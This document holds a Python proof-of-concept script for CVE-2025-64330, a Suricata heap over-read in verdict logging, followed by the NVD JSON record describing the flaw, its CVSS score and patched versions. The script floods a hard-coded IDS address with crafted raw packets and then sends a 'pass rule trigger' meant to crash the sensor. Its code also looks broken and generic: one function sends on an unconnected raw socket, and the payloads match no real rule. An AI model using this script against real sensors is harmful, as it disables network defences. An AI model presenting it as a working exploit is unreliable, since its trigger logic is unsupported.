CVE-2025-64330

#!/usr/bin/env python3 """ CVE-2025-64330 PoC - Suricata Heap Overflow in Verdict Logging This PoC demonstrates the concept of triggering the alert queue overflow Note: This is for educational purposes only """ import socket import struct import time def create_malicious_packet(seq, flags, payload): """ Create a TCP packet that triggers multiple Suricata rules """ # IP Header ip_header = struct.pack('!BBHHHBBH4s4s', 0x45, # Version 4, IHL 5 0x00, # TOS 20 + len(payload), # Total length 12345, # ID 0x4000, # Flags + Fragment offset 64, # TTL 6, # Protocol (TCP) 0, # Checksum (0 for now) socket.inet_aton('192.168.1.100'), # Source IP socket.inet_aton('192.168.1.1') # Dest IP ) # TCP Header tcp_header = struct.pack('!HHLLBBHHH', 80, # Source port 8080, # Dest port seq, # Seq 0, # Ack 0x50, # Data offset flags, # Flags 65535, # Window 0, # Checksum 0 # Urgent pointer ) return ip_header + tcp_header + payload def send_flood_of_alerts(target_ip, port, count=100): """ Send multiple packets to fill the alert queue """ sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW) sock.connect((target_ip, port)) print(f"[*] Sending {count} malicious packets to fill alert queue...") for i in range(count): payload = b'X' * 100 # Payload to trigger detection packet = create_malicious_packet(i, 0x02, payload) # SYN flag sock.send(packet) time.sleep(0.01) print("[+] Alert queue should be filled now") def send_pass_trigger(target_ip, port): """ Send a packet that matches a pass rule after alert queue is full This triggers the overflow condition """ sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW) print("[*] Sending pass rule trigger packet...") # This packet should trigger alert queue + pass rule payload = b'SPECIAL_TRIGGER_PAYLOAD' * 10 packet = create_malicious_packet(999999, 0x18, payload) # PSH, ACK flags sock.send(packet) print("[+] Pass rule packet sent - may trigger crash if vulnerable") if __name__ == "__main__": target = "192.168.1.1" # Suricata sensor IP port = 8080 print("[*] CVE-2025-64330 Suricata Heap Overflow PoC") print("[*] Target: Suricata IDS/IPS") print("[*] Requirement: Suricata configured with eve.alert/eve.drop logging") # Step 1: Fill the alert queue send_flood_of_alerts(target, port, count=100) # Step 2: Trigger pass rule to cause overflow send_pass_trigger(target, port) print("[*] Attack sequence complete") print("[!] Check Suricata logs for crash or restart")

{"cve": {"id": "CVE-2025-64330", "sourceIdentifier": "[email protected]", "published": "2025-11-26T23:15:48.093", "lastModified": "2025-12-05T13:30:59.787", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Suricata is a network IDS, IPS and NSM engine developed by the OISF (Open Information Security Foundation) and the Suricata community. Prior to versions 7.0.13 and 8.0.2, a single byte read heap overflow when logging the verdict in eve.alert and eve.drop records can lead to crashes. This requires the per packet alert queue to be filled with alerts and then followed by a pass rule. This issue has been patched in versions 7.0.13 and 8.0.2. To reduce the likelihood of this issue occurring, the alert queue size a should be increased (packet-alert-max in suricata.yaml) if verdict is enabled."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-122"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oisf:suricata:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.0.13", "matchCriteriaId": "AA4D86E3-44A3-4B0B-9CF4-9FC88091D3C1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:oisf:suricata:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.0.0", "versionEndExcluding": "8.0.2", "matchCriteriaId": "C93A731C-19AD-4067-B28C-17164C2D981D"}]}]}], "references": [{"url": "https://github.com/OISF/suricata/commit/482e5eac9218d007adbe2410d6c00173368ce947", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/OISF/suricata/security/advisories/GHSA-83v7-gm34-f437", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}